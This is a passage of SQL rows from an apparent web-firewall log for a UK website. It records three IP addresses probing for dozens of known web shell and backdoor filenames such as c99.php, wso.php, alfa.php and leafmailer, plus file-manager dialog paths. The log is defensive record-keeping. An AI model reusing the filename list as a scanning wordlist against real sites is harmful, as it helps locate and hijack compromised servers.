tobj8hMZCm74QaAPLU','','19|0|0|0|www.dailyjolly.co.uk/assets/administrator/filemanager/dialog.php',0,19,0),('154.246.120.10',2599843850,'',0,1674918896.0149,55,'pqcbniKF7Ijoywg4UBlufkWe','','19|0|0|0|www.dailyjolly.co.uk/assets/admin/js/filemanager/dialog.php',0,19,0),('154.246.120.10',2599843850,'',0,1674918896.9945,55,'9XKU0xVrSZtw3Cskm51Q6TMb','','19|0|0|0|www.dailyjolly.co.uk/assets/plugins/filemanager/dialog.php',0,19,0),('154.246.120.10',2599843850,'',0,1674918897.5351,55,'ZBkYlSi185OK9bHQgAz3UmLq','','19|0|0|0|www.dailyjolly.co.uk/assets/filemanager/dialog.php',0,19,0),('154.246.120.10',2599843850,'',0,1674918897.6194,10,'ZBkYlSi185OK9bHQgAz3UmLq','','707|0|0|0|www.dailyjolly.co.uk/assets/filemanager/dialog.php',0,707,0),('103.137.204.51',1737083955,'',0,1674925149.3827,55,'nNeCuxYOUDVG23qQ76AWItoz','','19|0|0|0|www.dailyjolly.co.uk/x.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925149.9837,55,'cvWkraNHhz3tosdwJEP1C0qS','','19|0|0|0|www.dailyjolly.co.uk/alfa.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925152.0659,55,'w2BzXYT8k375NAa9txOUDdgQ','','19|0|0|0|www.dailyjolly.co.uk/c99.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925152.7022,55,'EIqFKg7VLU3DnPoAxTGbSZhi','','19|0|0|0|www.dailyjolly.co.uk/mini.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925153.2905,55,'1VQ7biyljuDY6BUAda5vezFK','','19|0|0|0|www.dailyjolly.co.uk/a.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925153.3225,10,'1VQ7biyljuDY6BUAda5vezFK','','707|0|0|0|www.dailyjolly.co.uk/a.php',0,707,0),('103.137.204.51',1737083955,'',0,1674925153.9344,55,'iZ8WYrFXxz3pTIuKaERHDqf2','','19|0|0|0|www.dailyjolly.co.uk/wso.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925154.5211,55,'XzvTEmRouKS4WcI6e8rVCZHj','','19|0|0|0|www.dailyjolly.co.uk/home.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925155.1158,55,'VQyhaq4fzXRdk23S75wKvtDU','','19|0|0|0|www.dailyjolly.co.uk/shell.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925155.7404,55,'Oui9UjG8kVtyfnAhr4Jd25Ka','','19|0|0|0|www.dailyjolly.co.uk/leaf.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925156.3770,55,'ZHQ9EUgJ5IvadDlCMTR4tVOX','','19|0|0|0|www.dailyjolly.co.uk/wp-admin.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925156.9620,55,'IJQzrjZvSo8AF3auTqBc6LwG','','19|0|0|0|www.dailyjolly.co.uk/leafmailer2.8.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925157.6469,55,'QzohLnGfvD3PiCuWMAb08c9w','','19|0|0|0|www.dailyjolly.co.uk/wso.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925158.2483,55,'dsALfV7uM5mTkPFZB2vr4gU1','','19|0|0|0|www.dailyjolly.co.uk/a.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925158.8444,55,'4uJFshx8tqlXEPvSZ62gHkQO','','19|0|0|0|www.dailyjolly.co.uk/leaf.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925159.4709,55,'I1dhmGer0PaQKWTVZkfFBzij','','19|0|0|0|www.dailyjolly.co.uk/alex.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925160.0771,55,'duX2fKz8s6WZUGh1lC3M7ABo','','19|0|0|0|www.dailyjolly.co.uk/uploader.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925161.3756,55,'ipDO9nkGYKIdlMe8ArSzZC3c','','19|0|0|0|www.dailyjolly.co.uk/mailer.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925161.9768,55,'Gu5CVXbOkKAaFLr384t0UNiW','','19|0|0|0|www.dailyjolly.co.uk/anone.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925162.6761,55,'f2HqITyOg3cnF7driQ9PXAMv','','19|0|0|0|www.dailyjolly.co.uk/a.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925163.2941,55,'PUqEjwTygstr6AX5N1fShcIF','','19|0|0|0|www.dailyjolly.co.uk/wp-configer.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925163.9148,55,'WkrnTPpsSC9ltU7QocJjEhGX','','19|0|0|0|www.dailyjolly.co.uk/alfa.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925164.5145,55,'lMG28pYAskgWeFrB3yidwNCJ','','19|0|0|0|www.dailyjolly.co.uk/wso.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925165.1109,55,'2N4TDeG5JRCIBghd0ZnAuP1E','','19|0|0|0|www.dailyjolly.co.uk/c.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925165.7205,55,'bVg7tiljvoDE5Rn1fQGeYZF3','','19|0|0|0|www.dailyjolly.co.uk/1.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925166.3206,55,'8dfWz9UNIa35xZSp4ilcmbXA','','19|0|0|0|www.dailyjolly.co.uk/send.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925166.9384,55,'TyxMKPHbFSAwvrnEdhO10Qf9','','19|0|0|0|www.dailyjolly.co.uk/3.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925167.5264,55,'8iLkMozlCn4ZGyN1mdVr7Ejw','','19|0|0|0|www.dailyjolly.co.uk/404.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925168.0984,55,'iJ5SZYujFe4g8NbCDQVpsaXO','','19|0|0|0|www.dailyjolly.co.uk/sym.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925168.9449,55,'lPeS1AdV6Oag4v5TjnKkihxp','','19|0|0|0|www.dailyjolly.co.uk/wp-confirm.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925169.5387,55,'w2gFmBAHuZcjb8Yn5hOJqtks','','19|0|0|0|www.dailyjolly.co.uk/images/vuln.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925170.1295,55,'VzRkDXZjBa2HpWx7uthPKQYv','','19|0|0|0|www.dailyjolly.co.uk/dr.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925170.7407,55,'DAsF0heEG2rRipgz81cTQ5xB','','19|0|0|0|www.dailyjolly.co.uk/upload.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925171.3235,55,'4S37mPQpNoqUWcXVaD1EkC0R','','19|0|0|0|www.dailyjolly.co.uk/bypass.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925171.9250,55,'4KI5VfLuejir6X3FQaUhHcpo','','19|0|0|0|www.dailyjolly.co.uk/wp-blog.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925172.5549,55,'j5yKuqtGfxeb6X819Ovhcsd2','','19|0|0|0|www.dailyjolly.co.uk/data.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925173.1776,55,'2yTQgYe1olHL7IWSs6bP3kij','','19|0|0|0|www.dailyjolly.co.uk/owl.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925173.7964,55,'h0wTR8oOVlvuI3XqAWKe6GPn','','19|0|0|0|www.dailyjolly.co.uk/vuln.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925174.3819,55,'rzQjF2N5MheqoWKpLbtJGx8m','','19|0|0|0|www.dailyjolly.co.uk/symlink.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925174.9703,55,'cCRsBw72WzXQyDoi5PnvHNgl','','19|0|0|0|www.dailyjolly.co.uk/ohayo.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925175.5984,55,'jaLmF380H9xtVRXfq2WlPCho','','19|0|0|0|www.dailyjolly.co.uk/100.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925177.3845,55,'CnEybjLGVoJ6dQ0kM3Fax9Ns','','19|0|0|0|www.dailyjolly.co.uk/777.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925177.9799,55,'fnulDhZU5PbwSaXHMNsIOx28','','19|0|0|0|www.dailyjolly.co.uk/wp-content/wp-logins.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925178.5888,55,'ShwtX1K8NTfnyQY9OEzBRWcx','','19|0|0|0|www.dailyjolly.co.uk/1index.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925179.1872,55,'ItgxNWmvYLd1QMHarJ2zeSKl','','19|0|0|0|www.dailyjolly.co.uk/wp-wso.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925179.8442,55,'xvb0IKcCsQFA7gdkrfHPi8ZT','','19|0|0|0|www.dailyjolly.co.uk/2index.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925181.0392,55,'pinqgZOGoKeJDXPL3lRMzA5m','','19|0|0|0|www.dailyjolly.co.uk/wp-content/wp-admin.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925181.6608,55,'pYjtB4H3I0Z65aVboycufXSG','','19|0|0|0|www.dailyjolly.co.uk/wp-configer.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925182.9598,55,'0ZDmj1wW4t6AES7yXpPOfKCq','','19|0|0|0|www.dailyjolly.co.uk/wp-admin.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925183.5493,55,'0J6FsVKCremMWqod1yt8jEYD','','19|0|0|0|www.dailyjolly.co.uk/mini.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925184.1436,55,'1grJF0iOyhDGNVfpnxb7UL83','','19|0|0|0|www.dailyjolly.co.uk/old-index.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925184.7335,55,'oJAuPyM5zfK1mRiEDOce26nQ','','19|0|0|0|www.dailyjolly.co.uk/doc.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925185.3384,55,'uRlgv2OTomAMsNtfDQ80G5Ib','','19|0|0|0|www.dailyjolly.co.uk/ups.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925185.9621,55,'kWb0xnyJupf1vBLUq72wg8Od','','19|0|0|0|www.dailyjolly.co.uk/shx.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925186.5539,55,'6KYZzn7T10LMsrUHlEADBFNQ','','19|0|0|0|www.dailyjolly.co.uk/FoxWSO.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925187.1518,55,'kCl3yNWd7vhD6xI2QjzEpgcS','','19|0|0|0|www.dailyjolly.co.uk/x.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925187.7498,55,'iYSDCrKFunpox8gJh0yLzT2e','','19|0|0|0|www.dailyjolly.co.uk/cms.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925188.4103,55,'1obY0TFQrtcInq2S3HladPJw','','19|0|0|0|www.dailyjolly.co.uk/stindex.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925189.0545,55,'vltLoVHXsdcDnxCT2wPB76YU','','19|0|0|0|www.dailyjolly.co.uk/wp-uploads.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925189.7145,55,'AOhnXu8pYWoyVHqF0lP6bRzt','','19|0|0|0|www.dailyjolly.co.uk/autoload_classmap.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925190.3319,55,'EFmOGlqQLoiasZBtNXgxP6cu','','19|0|0|0|www.dailyjolly.co.uk/Gel.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925190.9598,55,'vQLu3MjVmYytkzGlP8e4CJda','','19|0|0|0|www.dailyjolly.co.uk/defau1t.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925191.5355,55,'QBmoOHb6cIwAJZgS3MaUuCNL','','19|0|0|0|www.dailyjolly.co.uk/0byte.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925192.1562,55,'Xvfz89kbOiL2YyRgJK0x4Tre','','19|0|0|0|www.dailyjolly.co.uk/wp.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925192.7412,55,'LqjSiorkUdZ8AValNpWuQxh1','','19|0|0|0|www.dailyjolly.co.uk/41.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925193.3769,55,'BZHitWbUaVNLzlwmAM0Jx187','','19|0|0|0|www.dailyjolly.co.uk/media-admin.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925194.0383,55,'uGB57zdsj3ocXMRHZ4QaKn9m','','19|0|0|0|www.dailyjolly.co.uk/4price.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925194.7486,55,'NgHpijPqET0MdZl5ckuvs6X9','','19|0|0|0|www.dailyjolly.co.uk/MARIJUANA.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925195.6613,55,'Y9xh6rdNcQe7TanoZMvXOS2l','','19|0|0|0|www.dailyjolly.co.uk/marijuana.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925196.2787,55,'3i8ut4AEB7sneoTmDWRwvL9F','','19|0|0|0|www.dailyjolly.co.uk/f.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925196.9155,55,'RmeiVhw0WOcvnNLjyHbq6QEf','','19|0|0|0|www.dailyjolly.co.uk/.fk.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925198.0791,55,'1cHOfwpdXl2bIAuZ3rW0MqsF','','19|0|0|0|www.dailyjolly.co.uk/wikindex.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925198.6821,55,'louOUzncCPdZvt3QrSHh7DWy','','19|0|0|0|www.dailyjolly.co.uk/xox.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925199.3159,55,'GbXjMz14mqitneIHYo2hS7u5','','19|0|0|0|www.dailyjolly.co.uk/o.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925199.9182,55,'EeyujCbrHGlps4iDv06gxmWM','','19|0|0|0|www.dailyjolly.co.uk/new.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925200.5131,55,'ls9GuWKEmgfFp08D6cnJxQvX','','19|0|0|0|www.dailyjolly.co.uk/3index.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925201.1374,55,'Hzxl6JBp9US8VuvC7Ftg0fQe','','19|0|0|0|www.dailyjolly.co.uk/sindex.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925201.7880,55,'QpEr3P8okZ4qDIRWue1y7XlH','','19|0|0|0|www.dailyjolly.co.uk/baindex.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925202.4022,55,'41JGdfxpgDa3zbyO7qIlYKBP','','19|0|0|0|www.dailyjolly.co.uk/new-index.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925203.0428,55,'8otY5JV924TpzBIbxeXmvCiS','','19|0|0|0|www.dailyjolly.co.uk/wi.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925204.2065,55,'iSlIGsyBWQCANYcDpPh0qn8z','','19|0|0|0|www.dailyjolly.co.uk/XxX.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925204.7952,55,'OIYB7WUtbZ8qSQGevow1EaAV','','19|0|0|0|www.dailyjolly.co.uk/mar.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925205.3935,55,'a1LjgndWCHGuIlSFmAXqNDZ4','','19|0|0|0|www.dailyjolly.co.uk/root.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925206.0401,55,'GPMwZ5x1DdvI7ErVe3FWoh9s','','19|0|0|0|www.dailyjolly.co.uk/11index.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925217.2960,55,'wrXCt1YyeAjaLqdNOzWgcMPl','','19|0|0|0|www.dailyjolly.co.uk/nee.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925218.1855,55,'bVaYkPsdNu2RXviE7qf1WTAM','','19|0|0|0|www.dailyjolly.co.uk/v.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925218.8404,55,'A1PiqvZEwo2njHr48mleabsx','','19|0|0|0|www.dailyjolly.co.uk/z.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925219.4553,55,'CqPF4AQMxOj0cubdJ5Tm7vrV','','19|0|0|0|www.dailyjolly.co.uk/xx.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925220.0923,55,'HDJgjWmVaiSc1Mr4ZuzqLO7v','','19|0|0|0|www.dailyjolly.co.uk/g.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925220.7452,55,'C5Ng3q2vdE61XUYxr9VozHJp','','19|0|0|0|www.dailyjolly.co.uk/m.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925221.3673,55,'EZYxTyDrwoHQNtsMauvmRkpC','','19|0|0|0|www.dailyjolly.co.uk/shell.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925221.9740,55,'Ip6HdBbUWnwvlLYZmXOrDcaS','','19|0|0|0|www.dailyjolly.co.uk/sh3ll.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925222.5597,55,'qNOMYPiQAwLogSGlBcT0nDIe','','19|0|0|0|www.dailyjolly.co.uk/c99.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925223.1888,55,'G4WSD9Qmfv8s5aP7Or2CcZiw','','19|0|0|0|www.dailyjolly.co.uk/alexuse.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925223.7774,55,'wqmNIv2fZt5AgR3Xe8ib6jPE','','19|0|0|0|www.dailyjolly.co.uk/w.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925224.3849,55,'Q317rjnvtslzcifYOhxSIGJ0','','19|0|0|0|www.dailyjolly.co.uk/ws.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925224.9930,55,'0WbEpI9MDkySaZlgcrQ6jJL7','','19|0|0|0|www.dailyjolly.co.uk/2.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925225.5662,55,'LJRFXloQwW2ptOHq60jKVg8n','','19|0|0|0|www.dailyjolly.co.uk/lol.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925226.2235,55,'1oF25pSthgVY7XZc6ExudINL','','19|0|0|0|www.dailyjolly.co.uk/87.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925226.8029,55,'8PdnFoKvupESBfysRNkjCHiD','','19|0|0|0|www.dailyjolly.co.uk/7yn.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925227.4207,55,'OhVlUTtRXoFHZSqbBAu7xzMY','','19|0|0|0|www.dailyjolly.co.uk/wp-content/marijuana.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925228.4617,55,'PYQXMOnZbtrEFvmkjfo3xeNS','','19|0|0|0|www.dailyjolly.co.uk/haxor.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925229.0523,55,'IORlQmzDVG02qyUsEBo14evp','','19|0|0|0|www.dailyjolly.co.uk/403.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925229.6351,55,'lDLyuGRQsxjVkPA2cqodMfrT','','19|0|0|0|www.dailyjolly.co.uk/13.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925230.2300,55,'E597lHWCawbeDP2dsvJYNAqm','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/xwp/up.php',0,19,0),('103.137.204.51',1737083955,'',0,1674925230.8384,55,'EXL5OlYo7sza6xDA1JRv90CN','','19|0|0|0|www.dailyjolly.co.uk/cpanel.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932256.6265,55,'mJeKLVSQWA67uDzgqd9ExUnt','','19|0|0|0|www.dailyjolly.co.uk/xleet.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932257.2542,55,'sAkD2PNTuVGlROZmCdieYFgx','','19|0|0|0|www.dailyjolly.co.uk/0byte.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932257.8722,55,'HF8UEx4zwCNqchtlrWRengGj','','19|0|0|0|www.dailyjolly.co.uk/wp-content/fw.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932258.4806,55,'IFtx90uQky7DWRiTmch65Haq','','19|0|0|0|www.dailyjolly.co.uk/sym.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932259.1907,55,'J9KaprNYzthlmIsFqT7Ee3VL','','19|0|0|0|www.dailyjolly.co.uk/sym403.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932259.2065,10,'J9KaprNYzthlmIsFqT7Ee3VL','','707|0|0|0|www.dailyjolly.co.uk/sym403.php',0,707,0),('172.174.224.29',2897141789,'',0,1674932259.8405,55,'qlLaDwBt1EPmszG7niF93TQS','','19|0|0|0|www.dailyjolly.co.uk/xl.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932260.4449,55,'mzyKIY5RBFD7N3EQpCoHLilr','','19|0|0|0|www.dailyjolly.co.uk/symlink.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932261.0819,55,'DqQ13VONJ7r5LwieyaAHmRPn','','19|0|0|0|www.dailyjolly.co.uk/wp.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932261.6889,55,'RuaGC72Lmpj9FJiltKgsUD0c','','19|0|0|0|www.dailyjolly.co.uk/404.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932262.2845,55,'zLA1ijmXak4gPNo9GpMh2tBv','','19|0|0|0|www.dailyjolly.co.uk/403.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932262.8713,55,'DKFnlwCQ63gVJkpb28UTIvmP','','19|0|0|0|www.dailyjolly.co.uk/up.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932263.4851,55,'txu8mKbWoPhDCSsZ0cT1eOHQ','','19|0|0|0|www.dailyjolly.co.uk/c99.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932264.1188,55,'HJNRbFv3dQ68VYaTCOS9Zptm','','19|0|0|0|www.dailyjolly.co.uk/xxx.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932264.7423,55,'F0vAfLB7leREXzTSrowsjGp3','','19|0|0|0|www.dailyjolly.co.uk/ok.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932265.3430,55,'v0zaNZH8n1TdBipYmDestgXG','','19|0|0|0|www.dailyjolly.co.uk/0.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932265.9905,55,'NZbsO9pP2JaVGCXec8dE5KwS','','19|0|0|0|www.dailyjolly.co.uk/x.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932266.5885,55,'zDfayRZkbNj9FWH6gvVGu3mE','','19|0|0|0|www.dailyjolly.co.uk/xx.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932267.1721,55,'eBZ6LRWI4O8EkbdNXxU31TiP','','19|0|0|0|www.dailyjolly.co.uk/1.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932267.7824,55,'bYyX5rfAH61DhaVqTlUup9x0','','19|0|0|0|www.dailyjolly.co.uk/2.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932268.3670,55,'Gdz5yHLsfPa4c0O3CwJYmVRK','','19|0|0|0|www.dailyjolly.co.uk/3.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932268.9880,55,'vqfnp7HtgXBOFj8lRQc4WLUE','','19|0|0|0|www.dailyjolly.co.uk/4.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932269.5667,55,'TOfSLeXd9VB8tCiQWrcpYzR5','','19|0|0|0|www.dailyjolly.co.uk/5.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932270.1522,55,'DCiN8tdMnOgkcbr1TZmWqj4Y','','19|0|0|0|www.dailyjolly.co.uk/6.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932270.7645,55,'WYueLGD5znbTipsIBOfyCZEV','','19|0|0|0|www.dailyjolly.co.uk/7.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932271.3867,55,'C7dpNyO2Kgu5vqt6SIA1zwan','','19|0|0|0|www.dailyjolly.co.uk/8.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932272.0397,55,'k81qhzuryTsEFVPwcSxfiAG3','','19|0|0|0|www.dailyjolly.co.uk/9.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932272.6935,55,'lzWfur2yjJ3dbqOBk7DFU5ZR','','19|0|0|0|www.dailyjolly.co.uk/10.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932273.2768,55,'u6C5KbYWRz107cLBmUeFsJZI','','19|0|0|0|www.dailyjolly.co.uk/a.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932273.8425,55,'eEXvf6Kj7QF4lqD0BcgVOZN2','','19|0|0|0|www.dailyjolly.co.uk/z.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932274.4542,55,'VGAaYRDctWrMqTHkO03NFIEX','','19|0|0|0|www.dailyjolly.co.uk/e.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932275.0741,55,'V3iluwapk4v1eQTLUWBmFybZ','','19|0|0|0|www.dailyjolly.co.uk/r.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932275.6798,55,'1cugwSjTU0KLxtIFYby5p4a2','','19|0|0|0|www.dailyjolly.co.uk/t.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932276.3241,55,'ky3lGrfUgJnjYHBiDMX7sT9C','','19|0|0|0|www.dailyjolly.co.uk/y.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932276.9671,55,'E34e78xvc5YJF0y1zHPu9MaI','','19|0|0|0|www.dailyjolly.co.uk/u.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932277.5333,55,'0NSbRwi3tWnKMC4Zcxh8Pgdz','','19|0|0|0|www.dailyjolly.co.uk/i.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932278.1382,55,'LDPOYle51KXkZEUyg9Nq32RB','','19|0|0|0|www.dailyjolly.co.uk/o.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932278.7511,55,'ki8Q6DyaO0E7N3rLzMlYsjvU','','19|0|0|0|www.dailyjolly.co.uk/p.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932279.3247,55,'c4lWDX1wg3SV8xsZFJ9fLMOC','','19|0|0|0|www.dailyjolly.co.uk/q.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932279.8987,55,'lMuExKXLcQyoZdY5USH1ajJB','','19|0|0|0|www.dailyjolly.co.uk/s.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932280.5270,55,'qhFlIGTLQBjd4t0zsDeXif6M','','19|0|0|0|www.dailyjolly.co.uk/d.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932281.1549,55,'OlS7FuXtkpqUcezo1E4CIN63','','19|0|0|0|www.dailyjolly.co.uk/f.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932281.7844,55,'phYi2M9EwtZkmDROJ3d7GVXF','','19|0|0|0|www.dailyjolly.co.uk/g.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932282.3753,55,'iFg7Cf8539qoxzAcG4pykdIa','','19|0|0|0|www.dailyjolly.co.uk/h.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932283.0235,55,'hT4S1tCA8H5Y0JojbFkmfEuy','','19|0|0|0|www.dailyjolly.co.uk/j.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932283.6065,55,'7lsHz2DndtBreoEu4PF51vAg','','19|0|0|0|www.dailyjolly.co.uk/k.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932284.2076,55,'KP8XkchW3Fap2swSTLoDGedO','','19|0|0|0|www.dailyjolly.co.uk/l.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932284.8069,55,'3jmzNAsE2G0VWrdtPSylwFk6','','19|0|0|0|www.dailyjolly.co.uk/m.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932285.3938,55,'PYMIfprcAvd4noNRCqzTE3mS','','19|0|0|0|www.dailyjolly.co.uk/w.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932285.9910,55,'CglFvU4uHkQ3hEbePiB8WoK9','','19|0|0|0|www.dailyjolly.co.uk/v.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932286.6566,55,'VNEf3CjkbpBdDr1quX7PlGwi','','19|0|0|0|www.dailyjolly.co.uk/n.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932287.2949,55,'JyTkZxKbgz3whOlvSu5todHB','','19|0|0|0|www.dailyjolly.co.uk/b.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932287.8992,55,'4IMBhLuwf1orpDSGq26mjvsb','','19|0|0|0|www.dailyjolly.co.uk/c.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932288.4770,55,'SNsPfQbFCgRUjuKTYr1WMEO4','','19|0|0|0|www.dailyjolly.co.uk/wp-wso.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932289.1219,55,'tywXBErC29M3zj5i0AnWG4OK','','19|0|0|0|www.dailyjolly.co.uk/priv8.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932289.7262,55,'jeEJyB2MbU8tXZ4Tupr0A1a9','','19|0|0|0|www.dailyjolly.co.uk/minimo.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932290.3479,55,'BbOrgJt2xMlnF8s1ohYvyH0L','','19|0|0|0|www.dailyjolly.co.uk/V3.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932290.9289,55,'1SiGCqhVWQlpY7kK8wLsgU4H','','19|0|0|0|www.dailyjolly.co.uk/V5.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932291.5541,55,'SzPAnUfXYTC6uwvrcas3NIml','','19|0|0|0|www.dailyjolly.co.uk/www.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932292.1648,55,'C3nM7IxsQLHzjaB5DtEVTdvP','','19|0|0|0|www.dailyjolly.co.uk/100.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932292.7376,55,'kFR7OQUfJVgitXBD3u